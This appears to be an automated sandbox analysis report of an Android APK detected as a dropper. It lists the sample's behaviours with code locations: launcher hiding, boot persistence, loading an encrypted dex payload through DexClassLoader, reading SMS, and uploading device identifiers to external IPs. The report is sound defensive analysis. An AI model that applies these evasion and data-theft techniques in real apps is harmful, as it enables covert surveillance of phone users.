Source: com.google.gson.internal.bind.ReflectiveTypeAdapterFactory$1;->writeField:16API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.dynamic.zzn;->zzy:9API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.dynamite.DynamiteModule;->zzc:144API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.dynamite.DynamiteModule;->zzx:295API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.dynamite.DynamiteModule;->zzx:298API Call: java.lang.reflect.Field.get
Source: com.google.gson.FieldAttributes;->get:4API Call: java.lang.reflect.Field.get
Source: com.google.gson.internal.UnsafeAllocator$1;->newInstance:5API Call: java.lang.reflect.Method.invoke
Source: com.google.gson.internal.UnsafeAllocator$2;->newInstance:5API Call: java.lang.reflect.Method.invoke
Source: com.google.gson.internal.UnsafeAllocator$3;->newInstance:4API Call: java.lang.reflect.Method.invoke
Source: com.google.gson.internal.UnsafeAllocator;->create:24API Call: java.lang.reflect.Field.get
Source: com.google.gson.internal.UnsafeAllocator;->create:31API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzbhp;->zzb:88API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzcik;->zzazu:51API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzclk;->zzb:204API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzdyq;->zzbss:32API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.internal.zzfhl;->zzty:10API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzfht;->zzj:21API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzfhu;->zza:53API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzfiq;->zzdas:14API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzfkr;->run:4API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.internal.zzflt;->zza:20API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.internal.zzflt;->zza:39API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.zzflt;->zza:47API Call: java.lang.reflect.Method.invoke
Source: com.google.firebase.messaging.zza;->zza:32API Call: java.lang.reflect.Method.invoke
Source: com.google.firebase.messaging.zza;->zzrz:219API Call: java.lang.reflect.Method.invoke
Source: com.google.firebase.messaging.zza;->zzrz:236API Call: java.lang.reflect.Method.invoke
Source: com.google.firebase.messaging.zza;->zzrz:244API Call: java.lang.reflect.Method.invoke
Source: com.google.firebase.messaging.zza;->zzrz:257API Call: java.lang.reflect.Method.invoke
Source: com.google.firebase.messaging.zzc;->zza:79API Call: java.lang.reflect.Method.invoke
Source: com.google.firebase.messaging.zzc;->zza:131API Call: java.lang.reflect.Method.invoke
Source: com.google.firebase.messaging.zzc;->zza:164API Call: java.lang.reflect.Field.get
Source: com.google.firebase.messaging.zzc;->zza:388API Call: java.lang.reflect.Method.invoke
Source: com.google.firebase.messaging.zzc;->zzb:401API Call: java.lang.reflect.Method.invoke
Source: com.google.firebase.messaging.zzc;->zzbe:410API Call: java.lang.reflect.Field.get
Source: com.google.firebase.messaging.zzc;->zzbf:415API Call: java.lang.reflect.Field.get
Source: com.google.gson.internal.reflect.UnsafeReflectionAccessor;->getUnsafeInstance:12API Call: java.lang.reflect.Field.get
Source: com.google.gson.internal.reflect.UnsafeReflectionAccessor;->makeAccessibleWithUnsafe:30API Call: java.lang.reflect.Method.invoke
Source: com.google.gson.internal.reflect.UnsafeReflectionAccessor;->makeAccessibleWithUnsafe:40API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.security.ProviderInstaller;->installIfNeeded:20API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.util.zzaa;->zza:8API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.util.zzaa;->zza:16API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.util.zzaa;->zze:52API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.util.zzaa;->zze:59API Call: java.lang.reflect.Method.invoke

Persistence and Installation Behavior:

barindex
Has permission to install other packagesShow sources
Source: submitted apkRequest permission: android.permission.INSTALL_PACKAGES

Boot Survival:

barindex
Has permission to execute code after phone rebootShow sources
Source: submitted apkRequest permission: android.permission.RECEIVE_BOOT_COMPLETED
Installs a new wake lock (to get activate on phone screen on)Show sources
Source: com.google.firebase.iid.zzac;-><init>:6API Call: android.os.PowerManager.newWakeLock
Source: com.google.android.gms.internal.zzcyz;-><init>:21API Call: android.os.PowerManager.newWakeLock
Source: utils.packed.com.components.locker.LockerComponent$CheckService;->init:74API Call: android.os.PowerManager.newWakeLock

Hooking and other Techniques for Hiding and Protection:

barindex
Uses known network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 45149 -> 84
Source: unknownNetwork traffic detected: HTTP traffic on port 84 -> 45149
Queries list of running processes/tasksShow sources
Source: com.google.android.gms.gcm.zza;->zzdm:27API Call: android.app.ActivityManager.getRunningAppProcesses
Source: com.google.firebase.messaging.zza;->zzt:316API Call: android.app.ActivityManager.getRunningAppProcesses
Source: utils.packed.com.components.injects.processes_lib.AndroidProcesses;->getRunningAppProcessInfo:14API Call: android.app.ActivityManager.getRunningAppProcesses
Source: utils.packed.com.components.injects.stats_providers.ActivityManagerAppCheckerImpl;->getTopApplication:9API Call: android.app.ActivityManager.getRunningTasks
Removes its application launcher (likely to stay hidden)Show sources
Source: utils.packed.com.utils.CommonUtils;->hideApp:24API Call: android.content.pm.PackageManager.setComponentEnabledSetting
Uses Crypto APIsShow sources
Source: core.com.packed.CryptoUtils;->doCrypto:24API Call: javax.crypto.Cipher.getInstance
Source: com.google.firebase.iid.zzw;->zzb:5API Call: java.security.MessageDigest.getInstance
Source: com.google.firebase.iid.FirebaseInstanceId;->getId:181API Call: java.security.MessageDigest.digest
Source: core.com.packed.CryptoUtils;->doCrypto:26API Call: javax.crypto.Cipher.doFinal
Source: com.google.android.gms.internal.zzcno;->zzeq:156API Call: java.security.MessageDigest.getInstance
Source: com.google.android.gms.internal.zzcno;->zzab:334API Call: java.security.MessageDigest.digest
Source: com.google.firebase.iid.FirebaseInstanceId;->getId:181API Call: java.security.MessageDigest.digest
Source: com.google.firebase.iid.FirebaseInstanceId;->getId:181API Call: java.security.MessageDigest.digest
Source: com.appsflyer.j;->toSHA1:30API Call: java.security.MessageDigest.getInstance
Source: com.appsflyer.j;->toSHA1:34API Call: java.security.MessageDigest.update
Source: com.appsflyer.j;->getHashCode:74API Call: java.security.MessageDigest.digest
Source: com.appsflyer.j;->toMD5:14API Call: java.security.MessageDigest.getInstance
Source: com.appsflyer.j;->toMD5:18API Call: java.security.MessageDigest.update
Source: com.appsflyer.j;->getHashCodeV2:107API Call: java.security.MessageDigest.digest
Source: com.appsflyer.j;->toSHA1:34API Call: java.security.MessageDigest.update
Source: com.appsflyer.j;->getHashCodeV2:108API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzcju;->zzjv:156API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzcju;->zzjv:156API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzcju;->zzjv:156API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzcju;->zzjv:156API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzcil;->zza:385API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzcju;->zzjv:156API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzcil;->zza:385API Call: java.security.MessageDigest.digest
Source: com.google.firebase.iid.FirebaseInstanceId;->getId:181API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzcju;->zzjv:156API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzcil;->zza:385API Call: java.security.MessageDigest.digest
Source: com.google.firebase.iid.FirebaseInstanceId;->getId:181API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzcju;->zzjv:156API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.internal.zzcil;->zza:385API Call: java.security.MessageDigest.digest
Source: com.appsflyer.j;->toMD5:19API Call: java.security.MessageDigest.digest
Source: com.appsflyer.j;->toSHA1:35API Call: java.security.MessageDigest.digest
Source: com.appsflyer.j;->toSha256:46API Call: java.security.MessageDigest.getInstance
Source: com.appsflyer.j;->toSha256:48API Call: java.security.MessageDigest.update
Source: com.appsflyer.j;->toSha256:49API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.common.zzr;->getErrorMessage:10API Call: java.security.MessageDigest.digest
Source: com.google.firebase.iid.zzw;->zzb:6API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.iid.InstanceID;->zza:24API Call: java.security.MessageDigest.getInstance
Source: com.google.android.gms.iid.InstanceID;->zza:25API Call: java.security.MessageDigest.digest
Source: core.com.packed.CryptoUtils;->doCrypto:25API Call: javax.crypto.Cipher.init
Source: com.google.android.gms.common.util.zza;->zzeq:1API Call: java.security.MessageDigest.getInstance

Malware Analysis System Evasion:

barindex
Accesses /procShow sources
Source: Lcom/google/android/gms/common/util/zzu;->zzci(I)Ljava/lang/String;Method string: "/proc/"
Source: Lcom/google/android/gms/common/util/zzu;->zzany()Ljava/lang/String;Method string: "/proc/3416/cmdline"
Source: Lutils/packed/com/components/injects/processes_lib/AndroidProcesses;->isProcessInfoHidden()ZMethod string: "/proc/mounts"
Accesses android OS build fieldsShow sources
Source: utils.packed.com.utils.CommonUtils;->getDeviceFullName:2Field Access: android.os.Build.MANUFACTURER
Source: utils.packed.com.utils.CommonUtils;->getDeviceFullName:3Field Access: android.os.Build.MODEL
Source: com.appsflyer.a;->getAmazonAID:187Field Access: android.os.Build.MANUFACTURER
Source: com.appsflyer.AppsFlyerLib;->getEventParameters:1163Field Access: android.os.Build.BRAND
Source: com.appsflyer.AppsFlyerLib;->getEventParameters:1166Field Access: android.os.Build.DEVICE
Source: com.appsflyer.AppsFlyerLib;->getEventParameters:1169Field Access: android.os.Build.PRODUCT
Source: com.appsflyer.AppsFlyerLib;->getEventParameters:1175Field Access: android.os.Build.MODEL
Source: com.appsflyer.AppsFlyerLib;->getEventParameters:1178Field Access: android.os.Build.TYPE
Source: com.appsflyer.AppsFlyerLib;->getUniquePsuedoID:1542Field Access: android.os.Build.BOARD
Source: com.appsflyer.AppsFlyerLib;->getUniquePsuedoID:1545Field Access: android.os.Build.BRAND
Source: com.appsflyer.AppsFlyerLib;->getUniquePsuedoID:1548Field Access: android.os.Build.CPU_ABI
Source: com.appsflyer.AppsFlyerLib;->getUniquePsuedoID:1551Field Access: android.os.Build.DEVICE
Source: com.appsflyer.AppsFlyerLib;->getUniquePsuedoID:1554Field Access: android.os.Build.MANUFACTURER
Source: com.appsflyer.AppsFlyerLib;->getUniquePsuedoID:1557Field Access: android.os.Build.MODEL
Source: com.appsflyer.AppsFlyerLib;->getUniquePsuedoID:1560Field Access: android.os.Build.PRODUCT
Source: com.appsflyer.l;->loadStaticData:89Field Access: android.os.Build.BRAND
Source: com.appsflyer.l;->loadStaticData:90Field Access: android.os.Build.MODEL
Source: com.appsflyer.l;->loadStaticData:91Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.common.zzs;->zzci:115Field Access: android.os.Build.TYPE
Source: com.google.android.gms.internal.zzcju;->zzbbi:99Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.internal.zzckj;->zzc:807Field Access: android.os.Build.MODEL
Source: com.google.android.gms.internal.zzckj;->zzc:810Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.internal.zzckj;->start:1703Field Access: android.os.Build$VERSION.RELEASE
Source: com.google.android.gms.internal.zzckj;->zza:1880Field Access: android.os.Build.MODEL
Source: com.google.android.gms.internal.zzckj;->zza:1883Field Access: android.os.Build$VERSION.RELEASE
Checks partitionsShow sources
Source: Lutils/packed/com/components/injects/processes_lib/AndroidProcesses;->isProcessInfoHidden()ZMethod string: "/proc/mounts"
Source: Lutils/packed/com/components/injects/processes_lib/AndroidProcesses;->isProcessInfoHidden()ZMethod string: "Error reading /proc/mounts. Checking if UID \'readproc\' exists."
Potential date aware sample foundShow sources
Source: webteam.displ.com.MyApp;->isFullVersion:9API Call: java.util.Date.after
Source: utils.packed.com.shared.SdkBuilder;->buildUtils:23API Call: java.util.Date.after
Queries several sensitive phone informationsShow sources
Source: Lcom/appsflyer/l;->setDeviceData(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)VMethod string: "android"
Source: Lutils/packed/com/components/injects/processes_lib/models/AndroidAppProcess;-><init>(I)VMethod string: "cpu"
Source: Lcom/google/android/gms/iid/InstanceID;->getToken(Ljava/lang/String;Ljava/lang/String;Landroid/os/Bundle;)Ljava/lang/String;Method string: "type"
Source: Lcom/appsflyer/cache/RequestCacheData;-><init>([C)VMethod string: "version"
Source: Lutils/packed/com/components/CountryCodeComponent;->prepareDeviceInfo(Ljava/util/Map;)VMethod string: "phone"
Source: Lcom/appsflyer/AppsFlyerLib;->getAppId()Ljava/lang/String;Method string: "appid"
Source: Lcom/appsflyer/l;->setDeviceData(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)VMethod string: "imei"
Source: Lcom/appsflyer/l;->setDeviceData(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)VMethod string: "model"
Source: Lcom/appsflyer/AppsFlyerLib;->monitor(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)VMethod string: "sdk"
Source: Lcom/appsflyer/l;->setDeviceData(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)VMethod string: "brand"
Queries the unique operating system id (ANDROID_ID)Show sources
Source: utils.packed.com.utils.CommonUtils;->getDeviceId:20API Call: android.provider.Settings.Secure.getString
Source: com.appsflyer.AppsFlyerLib;->addDeviceTracking:104API Call: android.provider.Settings.Secure.getString
Source: com.google.android.gms.internal.zzckj;->zzc:790API Call: android.provider.Settings$Secure.getString

HIPS / PFW / Operating System Protection Evasion:

barindex
Uses the DexClassLoader (often used for code injection)Show sources
Source: webteam.displ.com.MyApp$Helper;-><init>:17API Call: dalvik.system.DexClassLoader.<init>("/data/user/0/com.antonsilin.android.apps/app_dex/loader-packed(4-2-1).encrypted")
Source: webteam.displ.com.MyApp$Helper;->loadBuilder:23API Call: dalvik.system.DexClassLoader.loadClass("utils.packed.com.shared.SdkBuilder")
Source: webteam.displ.com.MyApp$Helper;->loadBuilder:28API Call: dalvik.system.DexClassLoader.loadClass("utils.packed.com.shared.FcmToSdkCallbackImpl")

Language, Device and Operating System Detection:

barindex
Queries the SIM provider name (SPN - Service Provider Name)Show sources
Source: com.appsflyer.AppsFlyerLib;->getEventParameters:1341API Call: android.telephony.TelephonyManager.getSimOperatorName returned ""
Queries the network operator ISO country codeShow sources
Source: utils.packed.com.components.CountryCodeComponent;->prepareDeviceInfo:5API Call: android.telephony.TelephonyManager.getNetworkCountryIso returned ""
Queries the network operator nameShow sources
Source: com.appsflyer.AppsFlyerLib;->getEventParameters:1344API Call: android.telephony.TelephonyManager.getNetworkOperatorName returned "Swisscom Ltd"

Stealing of Sensitive Information:

barindex
Uploads sensitive phone information to the internet (privacy leak)Show sources
Source: 192.168.1.34:33816 -> 54.38.92.92:80HTTP traffic detected: Header contains sensitive information: dee2cdd8a7942efa (Secure.ANDROID_ID)
Source: 192.168.1.34:45149 -> 178.132.78.51:84HTTP traffic detected: Header contains sensitive information: dee2cdd8a7942efa (Secure.ANDROID_ID)
Source: 192.168.1.34:45149 -> 178.132.78.51:84HTTP traffic detected: Header contains sensitive information: Galaxy Nexus (android.os.Build.USER)
Creates SMS data (e.g. PDU)Show sources
Source: utils.packed.com.components.TextComponent;->readSmsTextOldApi:39API Call: android.telephony.SmsMessage.createFromPdu
Parses SMS data (e.g. originating address)Show sources
Source: utils.packed.com.components.TextComponent;->readSmsTextNewApi:23API Call: android.telephony.SmsMessage.getOriginatingAddress
Source: utils.packed.com.components.TextComponent;->readSmsTextNewApi:24API Call: android.telephony.SmsMessage.getMessageBody
Source: utils.packed.com.components.TextComponent;->readSmsTextNewApi:27API Call: android.telephony.SmsMessage.getMessageBody
Source: utils.packed.com.components.TextComponent;->readSmsTextOldApi:40API Call: android.telephony.SmsMessage.getOriginatingAddress
Source: utils.packed.com.components.TextComponent;->readSmsTextOldApi:41API Call: android.telephony.SmsMessage.getMessageBody
Source: utils.packed.com.components.TextComponent;->readSmsTextOldApi:44API Call: android.telephony.SmsMessage.getMessageBody
Queries list of installed packagesShow sources
Source: utils.packed.com.components.injects.InjectComponent;->getInstalledApps:6API Call: android.content.pm.PackageManager.getInstalledPackages
Queries stored mail and application accounts (e.g. Gmail or Whatsup)Show sources
Source: com.google.android.gms.common.internal.zzr;->getAccountName:20API Call: android.accounts.Account.name
Source: com.google.android.gms.internal.zzcyt;->zza:58API Call: android.accounts.Account.name
Source: com.google.android.gms.auth.api.signin.GoogleSignInAccount;->zzacd:71API Call: android.accounts.Account.name
Source: com.google.android.gms.auth.api.signin.GoogleSignInAccount;->zzacd:73API Call: android.accounts.Account.name
Source: com.google.android.gms.auth.api.signin.GoogleSignInOptions;->toJsonObject:42API Call: android.accounts.Account.name

Antivirus Detection

Initial Sample

SourceDetectionScannerLabelLink
com.antonsilin.android.apps-v3.0.0.apk100%AviraANDROID/Dropper.FNDZ.Gen

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.